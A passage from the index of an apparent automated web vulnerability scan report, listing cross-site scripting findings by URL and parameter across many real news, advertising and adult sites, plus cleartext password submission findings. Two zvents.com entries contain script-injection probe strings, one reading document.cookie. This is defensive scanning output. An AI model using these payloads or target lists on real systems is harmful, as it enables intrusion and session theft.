4.719. http://raw.oggifinogi.com/GetScript.aspx [oggiHeight parameter]

4.720. http://raw.oggifinogi.com/GetScript.aspx [oggiHeight parameter]

4.721. http://raw.oggifinogi.com/GetScript.aspx [oggiImpolite parameter]

4.722. http://raw.oggifinogi.com/GetScript.aspx [oggiSite parameter]

4.723. http://raw.oggifinogi.com/GetScript.aspx [oggiVary parameter]

4.724. http://raw.oggifinogi.com/GetScript.aspx [oggiVary parameter]

4.725. http://raw.oggifinogi.com/GetScript.aspx [oggiWidth parameter]

4.726. http://raw.oggifinogi.com/GetScript.aspx [oggiWidth parameter]

4.727. http://ru.imlive.com/ [name of an arbitrarily supplied request parameter]

4.728. http://ru.imlive.com/ [name of an arbitrarily supplied request parameter]

4.729. http://ru.imlive.com/waccess/ [gotopage parameter]

4.730. http://se.imlive.com/ [name of an arbitrarily supplied request parameter]

4.731. http://se.imlive.com/ [name of an arbitrarily supplied request parameter]

4.732. http://se.imlive.com/waccess/ [gotopage parameter]

4.733. http://smm.sitescout.com/tag.jsp [h parameter]

4.734. http://smm.sitescout.com/tag.jsp [pid parameter]

4.735. http://smm.sitescout.com/tag.jsp [w parameter]

4.736. http://syndication.mmismm.com/mmtnt.php [name of an arbitrarily supplied request parameter]

4.737. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

4.738. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

4.739. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

4.740. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

4.741. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]

4.742. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]

4.743. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]

4.744. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]

4.745. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]

4.746. http://tags.expo9.exponential.com/tags/NYDailyNewscom/ROS/tags.js [REST URL parameter 2]

4.747. http://tags.expo9.exponential.com/tags/NYDailyNewscom/ROS/tags.js [REST URL parameter 3]

4.748. http://tags.expo9.exponential.com/tags/NYDailyNewscom/ROS/tags.js/ [REST URL parameter 2]

4.749. http://tags.expo9.exponential.com/tags/NYDailyNewscom/ROS/tags.js/ [REST URL parameter 3]

4.750. http://tags.expo9.exponential.com/tags/RubiconProjectAudienceExtensionMB/Segment4/tags.js [REST URL parameter 2]

4.751. http://tags.expo9.exponential.com/tags/RubiconProjectAudienceExtensionMB/Segment4/tags.js [REST URL parameter 3]

4.752. http://tags.expo9.exponential.com/tags/RubiconProjectAudienceExtensionMB/Segment4/tags.js/ [REST URL parameter 2]

4.753. http://tags.expo9.exponential.com/tags/RubiconProjectAudienceExtensionMB/Segment4/tags.js/ [REST URL parameter 3]

4.754. http://tags.expo9.exponential.com/tags/Zedo1AE/AudienceSelect/tags.js [REST URL parameter 2]

4.755. http://tags.expo9.exponential.com/tags/Zedo1AE/AudienceSelect/tags.js [REST URL parameter 3]

4.756. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]

4.757. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js [cb parameter]

4.758. http://tr.imlive.com/ [name of an arbitrarily supplied request parameter]

4.759. http://tr.imlive.com/ [name of an arbitrarily supplied request parameter]

4.760. http://voken.eyereturn.com/ [233369&click parameter]

4.761. http://voken.eyereturn.com/pb/get [233369&click parameter]

4.762. http://widgets.mobilelocalnews.com/ [uid parameter]

4.763. http://www.addthis.com/bookmark.php [REST URL parameter 1]

4.764. http://www.addthis.com/bookmark.php [REST URL parameter 1]

4.765. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]

4.766. http://www.addthis.com/bookmark.php [v parameter]

4.767. http://www.berkshireeagle.com/ [name of an arbitrarily supplied request parameter]

4.768. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 1]

4.769. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 2]

4.770. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 3]

4.771. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 4]

4.772. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video [REST URL parameter 5]

4.773. http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/ [REST URL parameter 5]

4.774. http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/ [REST URL parameter 6]

4.775. http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/ [REST URL parameter 7]

4.776. http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/ [REST URL parameter 8]

4.777. http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/ [REST URL parameter 5]

4.778. http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/ [REST URL parameter 6]

4.779. http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/ [REST URL parameter 7]

4.780. http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/ [REST URL parameter 8]

4.781. http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/2011/01/28/senior-bowl-rewind-why-boston-college-ot-anthony-castonzo-has-become-a-patriots-fan/ [REST URL parameter 5]

4.782. http://www.bostonherald.com/blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/ [REST URL parameter 5]

4.783. http://www.bostonherald.com/blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/ [REST URL parameter 6]

4.784. http://www.bostonherald.com/includes/processAds.bg [companion parameter]

4.785. http://www.bostonherald.com/includes/processAds.bg [companion parameter]

4.786. http://www.bostonherald.com/includes/processAds.bg [page parameter]

4.787. http://www.bostonherald.com/includes/processAds.bg [page parameter]

4.788. http://www.bostonherald.com/includes/processAds.bg [position parameter]

4.789. http://www.bostonherald.com/includes/processAds.bg [position parameter]

4.790. http://www.bostonherald.com/mediacenter/ [name of an arbitrarily supplied request parameter]

4.791. http://www.bostonherald.com/mediacenter/video.php [bc_id parameter]

4.792. http://www.bostonherald.com/mediacenter/video.php [height parameter]

4.793. http://www.bostonherald.com/mediacenter/video.php [media_id parameter]

4.794. http://www.bostonherald.com/mediacenter/video.php [name of an arbitrarily supplied request parameter]

4.795. http://www.bostonherald.com/mediacenter/video.php [program_id parameter]

4.796. http://www.bostonherald.com/mediacenter/video.php [program_id parameter]

4.797. http://www.bostonherald.com/mediacenter/video.php [src parameter]

4.798. http://www.bostonherald.com/mediacenter/video.php [title parameter]

4.799. http://www.bostonherald.com/mediacenter/video.php [width parameter]

4.800. http://www.bostonherald.com/news/politics/view.bg [format parameter]

4.801. http://www.bostonherald.com/news/regional/view.bg [format parameter]

4.802. http://www.bostonherald.com/projects/payroll/cambridge/ [name of an arbitrarily supplied request parameter]

4.803. http://www.bostonherald.com/projects/payroll/cambridge/ [name of an arbitrarily supplied request parameter]

4.804. http://www.bostonherald.com/projects/payroll/mass_pike/ [name of an arbitrarily supplied request parameter]

4.805. http://www.bostonherald.com/projects/payroll/mass_pike/ [name of an arbitrarily supplied request parameter]

4.806. http://www.bostonherald.com/projects/payroll/quasi_state/ [name of an arbitrarily supplied request parameter]

4.807. http://www.bostonherald.com/projects/payroll/quincy/ [name of an arbitrarily supplied request parameter]

4.808. http://www.bostonherald.com/projects/payroll/quincy/ [name of an arbitrarily supplied request parameter]

4.809. http://www.bostonherald.com/projects/payroll/suffolk/ [name of an arbitrarily supplied request parameter]

4.810. http://www.bostonherald.com/projects/payroll/suffolk/ [name of an arbitrarily supplied request parameter]

4.811. http://www.bostonherald.com/projects/payroll/worcester/ [name of an arbitrarily supplied request parameter]

4.812. http://www.bostonherald.com/projects/payroll/worcester/ [name of an arbitrarily supplied request parameter]

4.813. http://www.bostonherald.com/search/ [topic parameter]

4.814. http://www.bostonherald.com/search/ [topic parameter]

4.815. http://www.cbs6albany.com/albany-community/ [REST URL parameter 1]

4.816. http://www.cbs6albany.com/albany-community/ [name of an arbitrarily supplied request parameter]

4.817. http://www.cbs6albany.com/albany-tv-programming/ [REST URL parameter 1]

4.818. http://www.cbs6albany.com/albany-tv-programming/ [name of an arbitrarily supplied request parameter]

4.819. http://www.cbs6albany.com/albany-weather-forecast [REST URL parameter 1]

4.820. http://www.cbs6albany.com/albany-weather-forecast [name of an arbitrarily supplied request parameter]

4.821. http://www.cbs6albany.com/common/archives/ [cat parameter]

4.822. http://www.cbs6albany.com/common/archives/ [cat parameter]

4.823. http://www.cbs6albany.com/common/archives/ [cat parameter]

4.824. http://www.cbs6albany.com/common/archives/ [db parameter]

4.825. http://www.cbs6albany.com/common/tools/load.php [css parameter]

4.826. http://www.cbs6albany.com/common/tools/load.php [js parameter]

4.827. http://www.cbs6albany.com/common/tools/load.php [js parameter]

4.828. http://www.cbs6albany.com/common/tools/load.php [name of an arbitrarily supplied request parameter]

4.829. http://www.cbs6albany.com/common/tools/load.php [name of an arbitrarily supplied request parameter]

4.830. http://www.cbs6albany.com/sections/abouthdtv/ [name of an arbitrarily supplied request parameter]

4.831. http://www.cbs6albany.com/sections/contactus/ [name of an arbitrarily supplied request parameter]

4.832. http://www.cbs6albany.com/sections/contactus/newstips/ [name of an arbitrarily supplied request parameter]

4.833. http://www.cbs6albany.com/sections/employmentopportunities/ [name of an arbitrarily supplied request parameter]

4.834. http://www.cbs6albany.com/sections/jobsonline/ [name of an arbitrarily supplied request parameter]

4.835. http://www.cbs6albany.com/sections/live-cameras/ [name of an arbitrarily supplied request parameter]

4.836. http://www.cbs6albany.com/sections/local-news/ [name of an arbitrarily supplied request parameter]

4.837. http://www.cbs6albany.com/sections/local-sports/ [name of an arbitrarily supplied request parameter]

4.838. http://www.cbs6albany.com/sections/production-department/ [name of an arbitrarily supplied request parameter]

4.839. http://www.cbs6albany.com/sections/publicfile/ [name of an arbitrarily supplied request parameter]

4.840. http://www.cbs6albany.com/sections/sales/ [name of an arbitrarily supplied request parameter]

4.841. http://www.cbs6albany.com/sections/satellitewaivers/ [name of an arbitrarily supplied request parameter]

4.842. http://www.cbs6albany.com/sections/schoolclosures/ [name of an arbitrarily supplied request parameter]

4.843. http://www.cbs6albany.com/sections/sitemap/ [name of an arbitrarily supplied request parameter]

4.844. http://www.cbs6albany.com/sections/sp-alerts/ [name of an arbitrarily supplied request parameter]

4.845. http://www.cbs6albany.com/sections/thirdParty/iframe_header/ [taxonomy parameter]

4.846. http://www.cbs6albany.com/sections/traffic-events/ [name of an arbitrarily supplied request parameter]

4.847. http://www.cbs6albany.com/sections/traffic/ [name of an arbitrarily supplied request parameter]

4.848. http://www.cbs6albany.com/sections/tvlistings/ [name of an arbitrarily supplied request parameter]

4.849. http://www.cbs6albany.com/sections/videocopies/ [name of an arbitrarily supplied request parameter]

4.850. http://www.cbs6albany.com/sections/weather/7day/ [name of an arbitrarily supplied request parameter]

4.851. http://www.cbs6albany.com/sections/web-links/ [name of an arbitrarily supplied request parameter]

4.852. http://www.cbs6albany.com/sections/wrgb-talent/ [name of an arbitrarily supplied request parameter]

4.853. http://www.collegeanduniversity.net/herald/ [name of an arbitrarily supplied request parameter]

4.854. http://www.mixpo.com/videoad/kD3_P_IRSdu0NijksWoruw/Chevrolet-LMA [REST URL parameter 2]

4.855. http://www.moxiesoft.com/search.aspx [searchtext parameter]

4.856. http://www.moxiesoft.com/search.aspx [searchtext parameter]

4.857. http://www.nydailynews.com/blogs/jets/2011/01/live-chat-friday-noon-1 [REST URL parameter 1]

4.858. http://www.nydailynews.com/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm [REST URL parameter 1]

4.859. http://www.nydailynews.com/blogs70f75/ [REST URL parameter 1]

4.860. http://www.paperg.com/jsfb/embed.php [bid parameter]

4.861. http://www.paperg.com/jsfb/embed.php [bid parameter]

4.862. http://www.paperg.com/jsfb/embed.php [name of an arbitrarily supplied request parameter]

4.863. http://www.paperg.com/jsfb/embed.php [pid parameter]

4.864. http://www.quantcast.com/p-352ZWwG8I7OVQ [REST URL parameter 1]

4.865. http://www.quantcast.com/p-352ZWwG8I7OVQ [REST URL parameter 1]

4.866. http://www.soundingsonline.com/about-us [name of an arbitrarily supplied request parameter]

4.867. http://www.soundingsonline.com/advertise [name of an arbitrarily supplied request parameter]

4.868. http://www.soundingsonline.com/boat-shop [name of an arbitrarily supplied request parameter]

4.869. http://www.soundingsonline.com/boat-shop/know-how [name of an arbitrarily supplied request parameter]

4.870. http://www.soundingsonline.com/boat-shop/new-boats [name of an arbitrarily supplied request parameter]

4.871. http://www.soundingsonline.com/boat-shop/new-gear [name of an arbitrarily supplied request parameter]

4.872. http://www.soundingsonline.com/boat-shop/on-powerboats [name of an arbitrarily supplied request parameter]

4.873. http://www.soundingsonline.com/boat-shop/on-sailboats [name of an arbitrarily supplied request parameter]

4.874. http://www.soundingsonline.com/boat-shop/q-a-a [name of an arbitrarily supplied request parameter]

4.875. http://www.soundingsonline.com/boat-shop/sea-savvy [name of an arbitrarily supplied request parameter]

4.876. http://www.soundingsonline.com/boat-shop/tech-talk [name of an arbitrarily supplied request parameter]

4.877. http://www.soundingsonline.com/boat-shop/used-boat-review [name of an arbitrarily supplied request parameter]

4.878. http://www.soundingsonline.com/calendar [name of an arbitrarily supplied request parameter]

4.879. http://www.soundingsonline.com/career-opportunities [name of an arbitrarily supplied request parameter]

4.880. http://www.soundingsonline.com/columns-blogs [name of an arbitrarily supplied request parameter]

4.881. http://www.soundingsonline.com/columns-blogs/bay-tripper [name of an arbitrarily supplied request parameter]

4.882. http://www.soundingsonline.com/columns-blogs/books [name of an arbitrarily supplied request parameter]

4.883. http://www.soundingsonline.com/columns-blogs/new-england-fishing [name of an arbitrarily supplied request parameter]

4.884. http://www.soundingsonline.com/columns-blogs/under-way [name of an arbitrarily supplied request parameter]

4.885. http://www.soundingsonline.com/component/yvcomment/ [name of an arbitrarily supplied request parameter]

4.886. http://www.soundingsonline.com/contact-us [name of an arbitrarily supplied request parameter]

4.887. http://www.soundingsonline.com/features [name of an arbitrarily supplied request parameter]

4.888. http://www.soundingsonline.com/features/destinations [name of an arbitrarily supplied request parameter]

4.889. http://www.soundingsonline.com/features/in-depth [name of an arbitrarily supplied request parameter]

4.890. http://www.soundingsonline.com/features/justyesterday [name of an arbitrarily supplied request parameter]

4.891. http://www.soundingsonline.com/features/lifestyle [name of an arbitrarily supplied request parameter]

4.892. http://www.soundingsonline.com/features/profiles [name of an arbitrarily supplied request parameter]

4.893. http://www.soundingsonline.com/features/technical [name of an arbitrarily supplied request parameter]

4.894. http://www.soundingsonline.com/features/type-of-boat [name of an arbitrarily supplied request parameter]

4.895. http://www.soundingsonline.com/index.php [name of an arbitrarily supplied request parameter]

4.896. http://www.soundingsonline.com/more/digital-publications [name of an arbitrarily supplied request parameter]

4.897. http://www.soundingsonline.com/more/the-masters-series [name of an arbitrarily supplied request parameter]

4.898. http://www.soundingsonline.com/news [name of an arbitrarily supplied request parameter]

4.899. http://www.soundingsonline.com/news/coastwise [name of an arbitrarily supplied request parameter]

4.900. http://www.soundingsonline.com/news/dispatches [name of an arbitrarily supplied request parameter]

4.901. http://www.soundingsonline.com/news/home-waters [name of an arbitrarily supplied request parameter]

4.902. http://www.soundingsonline.com/news/mishaps-a-rescues [name of an arbitrarily supplied request parameter]

4.903. http://www.soundingsonline.com/news/mishaps-a-rescues/index.php [name of an arbitrarily supplied request parameter]

4.904. http://www.soundingsonline.com/news/sailing [name of an arbitrarily supplied request parameter]

4.905. http://www.soundingsonline.com/news/todays-top-stories [name of an arbitrarily supplied request parameter]

4.906. http://www.soundingsonline.com/resources [name of an arbitrarily supplied request parameter]

4.907. http://www.soundingsonline.com/site-map [name of an arbitrarily supplied request parameter]

4.908. http://www.soundingsonline.com/subscription-services [name of an arbitrarily supplied request parameter]

4.909. http://www.soundingsonline.com/subscription-services/preview-current-issue [name of an arbitrarily supplied request parameter]

4.910. http://www.zvents.com/ [376e5%22%3E%3Cscript%3Ealert(1 parameter]

4.911. http://www.zvents.com/ [376e5%22%3E%3Cscript%3Ealert(document.cookie parameter]

4.912. http://www.zvents.com/ [name of an arbitrarily supplied request parameter]

4.913. http://www.zvents.com/albany-ny/events [REST URL parameter 1]

4.914. http://www.zvents.com/albany-ny/events [name of an arbitrarily supplied request parameter]

4.915. http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7 [Referer HTTP header]

4.916. http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 [Referer HTTP header]

4.917. http://ar.imlive.com/ [Referer HTTP header]

4.918. http://ar.imlive.com/waccess/ [Referer HTTP header]

4.919. http://br.imlive.com/ [Referer HTTP header]

4.920. http://br.imlive.com/waccess/ [Referer HTTP header]

4.921. http://cafr.imlive.com/ [Referer HTTP header]

4.922. http://cafr.imlive.com/waccess/ [Referer HTTP header]

4.923. http://de.imlive.com/ [Referer HTTP header]

4.924. http://de.imlive.com/waccess/ [Referer HTTP header]

4.925. http://dk.imlive.com/ [Referer HTTP header]

4.926. http://dk.imlive.com/waccess/ [Referer HTTP header]

4.927. http://es.imlive.com/ [Referer HTTP header]

4.928. http://es.imlive.com/waccess/ [Referer HTTP header]

4.929. http://fr.imlive.com/ [Referer HTTP header]

4.930. http://fr.imlive.com/waccess/ [Referer HTTP header]

4.931. http://gr.imlive.com/ [Referer HTTP header]

4.932. http://gr.imlive.com/waccess/ [Referer HTTP header]

4.933. http://ib.adnxs.com/ttj [Referer HTTP header]

4.934. http://imlive.com/ [Referer HTTP header]

4.935. http://imlive.com/GuestDiscountClubs.aspx [Referer HTTP header]

4.936. http://imlive.com/SiteInformation.html [Referer HTTP header]

4.937. http://imlive.com/awardarena/ [Referer HTTP header]

4.938. http://imlive.com/become_celeb.asp [Referer HTTP header]

4.939. http://imlive.com/become_host.asp [Referer HTTP header]

4.940. http://imlive.com/becomehost.aspx [Referer HTTP header]

4.941. http://imlive.com/categoryfs.asp [Referer HTTP header]

4.942. http://imlive.com/categoryfs.asp [Referer HTTP header]

4.943. http://imlive.com/categoryms.asp [Referer HTTP header]

4.944. http://imlive.com/categoryms.asp [Referer HTTP header]

4.945. http://imlive.com/customerservice.asp [Referer HTTP header]

4.946. http://imlive.com/disclaimer.asp [Referer HTTP header]

4.947. http://imlive.com/forgot.asp [Referer HTTP header]

4.948. http://imlive.com/forgot.aspx [Referer HTTP header]

4.949. http://imlive.com/homepagems3.asp [Referer HTTP header]

4.950. http://imlive.com/hostmembers.asp [Referer HTTP header]

4.951. http://imlive.com/live-sex-chats/ [Referer HTTP header]

4.952. http://imlive.com/live-sex-chats/adult-shows/ [Referer HTTP header]

4.953. http://imlive.com/live-sex-chats/cam-girls/ [Referer HTTP header]

4.954. http://imlive.com/live-sex-chats/cam-girls/categories/ [Referer HTTP header]

4.955. http://imlive.com/live-sex-chats/cam-girls/hotspots/ [Referer HTTP header]

4.956. http://imlive.com/live-sex-chats/cams-aroundthehouse/ [Referer HTTP header]

4.957. http://imlive.com/live-sex-chats/caught-on-cam/ [Referer HTTP header]

4.958. http://imlive.com/live-sex-chats/couple/ [Referer HTTP header]

4.959. http://imlive.com/live-sex-chats/fetish/ [Referer HTTP header]

4.960. http://imlive.com/live-sex-chats/fetish/categories/ [Referer HTTP header]

4.961. http://imlive.com/live-sex-chats/free-sex-video-for-ipod/ [Referer HTTP header]

4.962. http://imlive.com/live-sex-chats/free-sex-video/ [Referer HTTP header]

4.963. http://imlive.com/live-sex-chats/gay-couple/ [Referer HTTP header]

4.964. http://imlive.com/live-sex-chats/gay/ [Referer HTTP header]

4.965. http://imlive.com/live-sex-chats/guy-alone/ [Referer HTTP header]

4.966. http://imlive.com/live-sex-chats/happyhour/ [Referer HTTP header]

4.967. http://imlive.com/live-sex-chats/lesbian-couple/ [Referer HTTP header]

4.968. http://imlive.com/live-sex-chats/lesbian/ [Referer HTTP header]

4.969. http://imlive.com/live-sex-chats/live-sex-video/ [Referer HTTP header]

4.970. http://imlive.com/live-sex-chats/nude-chat/ [Referer HTTP header]

4.971. http://imlive.com/live-sex-chats/orgies/ [Referer HTTP header]

4.972. http://imlive.com/live-sex-chats/pornstars/ [Referer HTTP header]

4.973. http://imlive.com/live-sex-chats/role-play/ [Referer HTTP header]

4.974. http://imlive.com/live-sex-chats/sex-show-galleries/ [Referer HTTP header]

4.975. http://imlive.com/live-sex-chats/sex-show-photos/ [Referer HTTP header]

4.976. http://imlive.com/live-sex-chats/sex-show-sessions/ [Referer HTTP header]

4.977. http://imlive.com/live-sex-chats/sex-video-features/ [Referer HTTP header]

4.978. http://imlive.com/live-sex-chats/shemale-couple/ [Referer HTTP header]

4.979. http://imlive.com/live-sex-chats/shemale/ [Referer HTTP header]

4.980. http://imlive.com/live-sex-chats/shy-girl/ [Referer HTTP header]

4.981. http://imlive.com/liveexperts.asp [Referer HTTP header]

4.982. http://imlive.com/localcompanionship.asp [Referer HTTP header]

4.983. http://imlive.com/login.asp [Referer HTTP header]

4.984. http://imlive.com/minglesingles.asp [Referer HTTP header]

4.985. http://imlive.com/pr.asp [Referer HTTP header]

4.986. http://imlive.com/preparesearch.asp [Referer HTTP header]

4.987. http://imlive.com/preparesearch.aspx [Referer HTTP header]

4.988. http://imlive.com/search.asp [Referer HTTP header]

4.989. http://imlive.com/sitemap.html [Referer HTTP header]

4.990. http://imlive.com/videosfr.asp [Referer HTTP header]

4.991. http://imlive.com/warningms.asp [Referer HTTP header]

4.992. http://imlive.com/webcam-advanced-search/ [Referer HTTP header]

4.993. http://imlive.com/webcam-faq/ [Referer HTTP header]

4.994. http://imlive.com/webcam-login/ [Referer HTTP header]

4.995. http://imlive.com/webcam-sign-up/ [Referer HTTP header]

4.996. http://imlive.com/wmaster.ashx [Referer HTTP header]

4.997. http://imlive.com/wmaster.ashx [Referer HTTP header]

4.998. http://in.imlive.com/ [Referer HTTP header]

4.999. http://in.imlive.com/waccess/ [Referer HTTP header]

4.1000. http://it.imlive.com/ [Referer HTTP header]

4.1001. http://it.imlive.com/waccess/ [Referer HTTP header]

4.1002. http://jp.imlive.com/ [Referer HTTP header]

4.1003. http://jp.imlive.com/waccess/ [Referer HTTP header]

4.1004. http://mx.imlive.com/ [Referer HTTP header]

4.1005. http://mx.imlive.com/waccess/ [Referer HTTP header]

4.1006. http://nl.imlive.com/ [Referer HTTP header]

4.1007. http://nl.imlive.com/waccess/ [Referer HTTP header]

4.1008. http://no.imlive.com/ [Referer HTTP header]

4.1009. http://no.imlive.com/waccess/ [Referer HTTP header]

4.1010. http://onset.freedom.com/fi/analytics/cms/ [Referer HTTP header]

4.1011. http://pu.imlive.com/ [Referer HTTP header]

4.1012. http://pu.imlive.com/waccess/ [Referer HTTP header]

4.1013. http://ru.imlive.com/ [Referer HTTP header]

4.1014. http://ru.imlive.com/waccess/ [Referer HTTP header]

4.1015. http://se.imlive.com/ [Referer HTTP header]

4.1016. http://se.imlive.com/waccess/ [Referer HTTP header]

4.1017. http://tr.imlive.com/ [Referer HTTP header]

4.1018. http://tr.imlive.com/waccess/ [Referer HTTP header]

4.1019. http://www.addthis.com/bookmark.php [Referer HTTP header]

4.1020. http://www.addthis.com/bookmark.php [Referer HTTP header]

4.1021. http://a.collective-media.net/cmadj/bzo.847.CD39C435/ATF [cli cookie]

4.1022. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [cli cookie]

4.1023. http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience [cli cookie]

4.1024. http://a.collective-media.net/cmadj/q1.bosherald/be_ent [cli cookie]

4.1025. http://a.collective-media.net/cmadj/q1.bosherald/be_ent_fr [cli cookie]

4.1026. http://a.collective-media.net/cmadj/q1.bosherald/ent [cli cookie]

4.1027. http://a.collective-media.net/cmadj/q1.bosherald/ent_fr [cli cookie]

4.1028. http://a.collective-media.net/cmadj/uol.collective/ColeHaan_MM_Openness_CMN_13109 [cli cookie]

4.1029. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

4.1030. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

4.1031. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

4.1032. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]

4.1033. http://ar.voicefive.com/bmx3/broker.pli [ar_p67161473 cookie]

4.1034. http://ar.voicefive.com/bmx3/broker.pli [ar_p83612734 cookie]

4.1035. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

4.1036. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [FFpb cookie]

4.1037. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]

4.1038. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]

4.1039. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [FFpb cookie]

4.1040. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [ZEDOIDA cookie]

4.1041. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [FFpb cookie]

4.1042. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [FFpb cookie]

4.1043. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [ZEDOIDA cookie]

4.1044. http://tag.contextweb.com/TAGPUBLISH/getad.aspx [V cookie]

4.1045. http://tag.contextweb.com/TAGPUBLISH/getad.aspx [cwbh1 cookie]

4.1046. http://xads.zedo.com/ads2/c [a parameter]

4.1047. http://xads.zedo.com/ads2/c [name of an arbitrarily supplied request parameter]

5. Flash cross-domain policy

5.1. http://ad.afy11.net/crossdomain.xml

5.2. https://tt3.zedo.com/crossdomain.xml

6. Cleartext submission of password

6.1. http://ar.imlive.com/

6.2. http://bostonherald.com/track/inside_track/view.bg

6.3. http://bostonherald.com/track/star_tracks/view.bg

6.4. http://bostonherald.com/users/login

6.5. http://bostonherald.com/users/register/

6.6. http://br.imlive.com/

6.7. http://cafr.imlive.com/

6.8. http://de.imlive.com/

6.9. http://digg.com/submit

6.10. http://dk.imlive.com/

6.11. http://es.imlive.com/

6.12. http://fr.imlive.com/

6.13. http://gr.imlive.com/

6.14. http://imlive.com/

6.15. http://imlive.com/homepagems3.asp

6.16. http://imlive.com/webcam-login/

6.17. http://in.imlive.com/

6.18. http://it.imlive.com/

6.19. http://jp.imlive.com/

6.20. http://mx.imlive.com/

6.21. http://nl.imlive.com/

6.22. http://no.imlive.com/

6.23. http://pu.imlive.com/

6.24. http://ru.imlive.com/

6.25. http://se.imlive.com/

6.26. http://support.moxiesoft.com/

6.27. http://tr.imlive.com/

6.28. http://www.bostonherald.com/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also

6.29. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also

6.30. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6

6.31. http://www.bostonherald.com/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also

6.32. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2

6.33. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also

6.34. http://www.bostonherald.com/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5

6.35. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1

6.36. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0

6.37. http://www.bostonherald.com/news/regional/view.bg

6.38. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also

6.39. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4

6.40. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

6.41. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

